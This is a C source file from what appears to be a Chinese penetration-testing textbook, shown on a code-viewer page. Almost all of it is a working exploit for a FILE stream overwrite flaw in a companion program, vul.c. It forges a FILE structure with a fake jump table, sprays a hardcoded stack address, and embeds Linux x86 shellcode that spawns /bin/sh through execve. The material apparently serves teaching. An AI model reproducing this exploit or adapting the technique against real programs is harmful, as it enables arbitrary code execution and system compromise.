📄 fso_exploit.c
字号:
/* fso_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对vul.c的FSO漏洞利用程序
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define FUNCTIONOFFSET 0x1c //get from call *0x1c(%eax)
#define OFFSET1 0x46 //get from movsbl 0x46(%edx),%eax //this import
#define OFFSET2 8 //程序构造的原因,固定为8
char shellcode[]= /* linux x86 execve of "/bin//sh" */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
struct fake_file_stream{
char data[sizeof(FILE)-4];
char * file_jmps;
};
int main(int argc,char *argv[])
{
char buffer[4000];
struct fake_file_stream * fakep;
int i;
long fakefs_addr;
fakefs_addr = 0xbfffeb60;//atoll(argv[1]);
//printf("fakefs_addr %u\n",fakefs_addr);
for (i=0;i<3000;i+=4)
*(long *)&buffer[i]=fakefs_addr;
fakep= (struct fake_file_stream *)buffer;
fakep->file_jmps =fakefs_addr;
*(long *)&fakep->data[FUNCTIONOFFSET]=fakefs_addr+ sizeof(struct fake_file_stream)+OFFSET2;
memcpy(buffer+sizeof(struct fake_file_stream)+OFFSET2,shellcode,strlen(shellcode));
*(long *) &buffer[OFFSET1]=0x04040404; //make eax =4;
execl("./vul", "vul", buffer, NULL);
exit(0);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -